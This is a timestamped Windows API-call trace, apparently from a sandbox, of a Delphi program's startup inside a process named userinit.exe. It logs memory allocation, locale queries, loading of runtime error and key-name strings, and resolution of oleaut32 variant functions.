[0099.732] GlobalLock (hMem=0x37000c) returned 0x27b0020
[0099.733] GlobalHandle (pMem=0x27b0020) returned 0x37000c
[0099.733] GlobalUnlock (hMem=0x37000c) returned 0
[0099.733] GlobalReAlloc (hMem=0x37000c, dwBytes=0x102000, uFlags=0x2) returned 0x37000c
[0099.758] GlobalLock (hMem=0x37000c) returned 0x28c0020
[0099.759] GlobalHandle (pMem=0x28c0020) returned 0x37000c
[0099.759] GlobalUnlock (hMem=0x37000c) returned 0
[0099.759] GlobalReAlloc (hMem=0x37000c, dwBytes=0x104000, uFlags=0x2) returned 0x37000c
[0099.830] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.831] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.831] GlobalUnlock (hMem=0x37000c) returned 0
[0099.832] GlobalReAlloc (hMem=0x37000c, dwBytes=0x106000, uFlags=0x2) returned 0x37000c
[0099.858] GlobalLock (hMem=0x37000c) returned 0x27c0020
[0099.859] GlobalHandle (pMem=0x27c0020) returned 0x37000c
[0099.859] GlobalUnlock (hMem=0x37000c) returned 0
[0099.859] GlobalReAlloc (hMem=0x37000c, dwBytes=0x108000, uFlags=0x2) returned 0x37000c
[0099.930] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.931] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.931] GlobalUnlock (hMem=0x37000c) returned 0
[0099.931] GlobalReAlloc (hMem=0x37000c, dwBytes=0x10a000, uFlags=0x2) returned 0x37000c
[0099.953] GlobalLock (hMem=0x37000c) returned 0x27c0020
[0099.954] GlobalHandle (pMem=0x27c0020) returned 0x37000c
[0099.954] GlobalUnlock (hMem=0x37000c) returned 0
[0099.954] GlobalReAlloc (hMem=0x37000c, dwBytes=0x10c000, uFlags=0x2) returned 0x37000c
[0100.022] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0100.023] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x27c0000
[0100.023] VirtualAlloc (lpAddress=0x27c0000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x27c0000
[0100.111] GetKeyboardType (nTypeFlag=0) returned 4
[0100.111] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.111] GetStartupInfoA (in: lpStartupInfo=0xef4c8 | out: lpStartupInfo=0xef4c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0100.111] GetVersion () returned 0x1db10106
[0100.111] GetVersion () returned 0x1db10106
[0100.111] GetCurrentThreadId () returned 0xf80
[0100.111] GetModuleFileNameA (in: hModule=0x28d0000, lpFilename=0xeefc4, nSize=0x105 | out: lpFilename="\xd4\xef\x0e" (normalized: "c:\\windows\\system32\\ôï\x0e")) returned 0x0
[0100.111] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xeee9f, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.111] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xeefb4 | out: phkResult=0xeefb4*=0x0) returned 0x2
[0100.111] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xeefb4 | out: phkResult=0xeefb4*=0x0) returned 0x2
[0100.111] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xeefb4 | out: phkResult=0xeefb4*=0x0) returned 0x2
[0100.111] lstrcpynA (in: lpString1=0xeee9f, lpString2="\xd4\xef\x0e", iMaxLength=261 | out: lpString1="\xd4\xef\x0e") returned="\xd4\xef\x0e"
[0100.111] GetThreadLocale () returned 0x409
[0100.111] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xeefaf, cchData=5 | out: lpLCData="ENU") returned 4
[0100.112] lstrlenA (lpString="\xd4\xef\x0e") returned 3
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffc4, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0100.112] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x28dcc0
[0100.112] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x29f0000
[0100.112] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x28ecc0
[0100.112] VirtualAlloc (lpAddress=0x29f0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x29f0000
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffc3, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffc1, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffc2, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffd4, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffdd, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffd3, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffd0, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffd7, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffd6, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffe8, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffe9, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffea, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0100.112] LoadStringA (in: hInstance=0x28d0000, uID=0xffe7, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xffe5, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xffe3, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xffe2, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xffe1, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xffe0, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xffff, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfffe, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfffd, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfffc, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfffb, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfffa, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfff9, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfff8, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfff7, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfff6, lpBuffer=0xef0e8, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xfff4, lpBuffer=0xef0d4, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0100.113] LoadStringA (in: hInstance=0x28d0000, uID=0xffe4, lpBuffer=0xef0d4, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0100.113] GetVersionExA (in: lpVersionInformation=0xef46c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28d0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x8d\x02·\"\x8d\x02\x04õ\x0e") | out: lpVersionInformation=0xef46c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0100.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.113] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0100.113] GetThreadLocale () returned 0x409
[0100.113] GetThreadLocale () returned 0x409
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xef344, cchData=256 | out: lpLCData="Jan") returned 4
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xef344, cchData=256 | out: lpLCData="January") returned 8
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xef344, cchData=256 | out: lpLCData="Feb") returned 4
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xef344, cchData=256 | out: lpLCData="February") returned 9
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xef344, cchData=256 | out: lpLCData="Mar") returned 4
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xef344, cchData=256 | out: lpLCData="March") returned 6
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xef344, cchData=256 | out: lpLCData="Apr") returned 4
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xef344, cchData=256 | out: lpLCData="April") returned 6
[0100.113] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xef344, cchData=256 | out: lpLCData="May") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xef344, cchData=256 | out: lpLCData="May") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xef344, cchData=256 | out: lpLCData="Jun") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xef344, cchData=256 | out: lpLCData="June") returned 5
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xef344, cchData=256 | out: lpLCData="Jul") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xef344, cchData=256 | out: lpLCData="July") returned 5
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xef344, cchData=256 | out: lpLCData="Aug") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xef344, cchData=256 | out: lpLCData="August") returned 7
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xef344, cchData=256 | out: lpLCData="Sep") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xef344, cchData=256 | out: lpLCData="September") returned 10
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xef344, cchData=256 | out: lpLCData="Oct") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xef344, cchData=256 | out: lpLCData="October") returned 8
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xef344, cchData=256 | out: lpLCData="Nov") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xef344, cchData=256 | out: lpLCData="November") returned 9
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xef344, cchData=256 | out: lpLCData="Dec") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xef344, cchData=256 | out: lpLCData="December") returned 9
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xef344, cchData=256 | out: lpLCData="Sun") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xef344, cchData=256 | out: lpLCData="Sunday") returned 7
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xef344, cchData=256 | out: lpLCData="Mon") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xef344, cchData=256 | out: lpLCData="Monday") returned 7
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xef344, cchData=256 | out: lpLCData="Tue") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xef344, cchData=256 | out: lpLCData="Tuesday") returned 8
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xef344, cchData=256 | out: lpLCData="Wed") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xef344, cchData=256 | out: lpLCData="Wednesday") returned 10
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xef344, cchData=256 | out: lpLCData="Thu") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xef344, cchData=256 | out: lpLCData="Thursday") returned 9
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xef344, cchData=256 | out: lpLCData="Fri") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xef344, cchData=256 | out: lpLCData="Friday") returned 7
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xef344, cchData=256 | out: lpLCData="Sat") returned 4
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xef344, cchData=256 | out: lpLCData="Saturday") returned 9
[0100.114] GetThreadLocale () returned 0x409
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xef3a0, cchData=256 | out: lpLCData="$") returned 2
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xef3a0, cchData=256 | out: lpLCData="0") returned 2
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xef3a0, cchData=256 | out: lpLCData="0") returned 2
[0100.114] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xef498, cchData=2 | out: lpLCData=",") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xef498, cchData=2 | out: lpLCData=".") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xef3a0, cchData=256 | out: lpLCData="2") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xef498, cchData=2 | out: lpLCData="/") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xef3a0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0100.115] GetThreadLocale () returned 0x409
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef36c, cchData=256 | out: lpLCData="1") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xef3a0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0100.115] GetThreadLocale () returned 0x409
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef36c, cchData=256 | out: lpLCData="1") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xef498, cchData=2 | out: lpLCData=":") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xef3a0, cchData=256 | out: lpLCData="AM") returned 3
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xef3a0, cchData=256 | out: lpLCData="PM") returned 3
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xef3a0, cchData=256 | out: lpLCData="0") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xef3a0, cchData=256 | out: lpLCData="0") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xef3a0, cchData=256 | out: lpLCData="0") returned 2
[0100.115] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xef498, cchData=2 | out: lpLCData=",") returned 2
[0100.115] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0100.115] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0100.115] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0100.115] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0100.115] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0100.115] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0100.116] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0100.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0100.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0100.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0100.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0100.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0100.117] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0100.117] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0100.117] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0100.117] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0100.117] GetDC (hWnd=0x0) returned 0xe010895
[0100.117] GetDeviceCaps (hdc=0xe010895, index=90) returned 96
[0100.118] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.118] GetDC (hWnd=0x0) returned 0xe010895
[0100.118] GetDeviceCaps (hdc=0xe010895, index=104) returned 0
[0100.118] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.118] CreatePalette (plpal=0xef0fc) returned 0x38080875
[0100.118] GetStockObject (i=7) returned 0x1b00017
[0100.118] GetStockObject (i=5) returned 0x1900015
[0100.118] GetStockObject (i=13) returned 0x18a002e
[0100.118] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0100.118] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff3d, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff3c, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff3b, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff3a, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff39, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff38, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff37, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff36, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0100.118] LoadStringA (in: hInstance=0x28d0000, uID=0xff35, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff34, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff33, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff32, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff31, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff30, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff4f, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff4e, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff4d, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xff4c, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0100.119] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0100.119] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0100.119] GetCurrentThreadId () returned 0xf80
[0100.119] GlobalAddAtomA (lpString="WndProcPtr028D000000000F80") returned 0xc14a
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xfefc, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xfefb, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0100.119] LoadStringA (in: hInstance=0x28d0000, uID=0xfefa, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef9, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef8, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef7, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef6, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef5, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef4, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef3, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef2, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef1, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xfef0, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff0f, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff0e, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff0d, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff0c, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff0b, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff0a, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff09, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff08, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff07, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff06, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff05, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff04, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
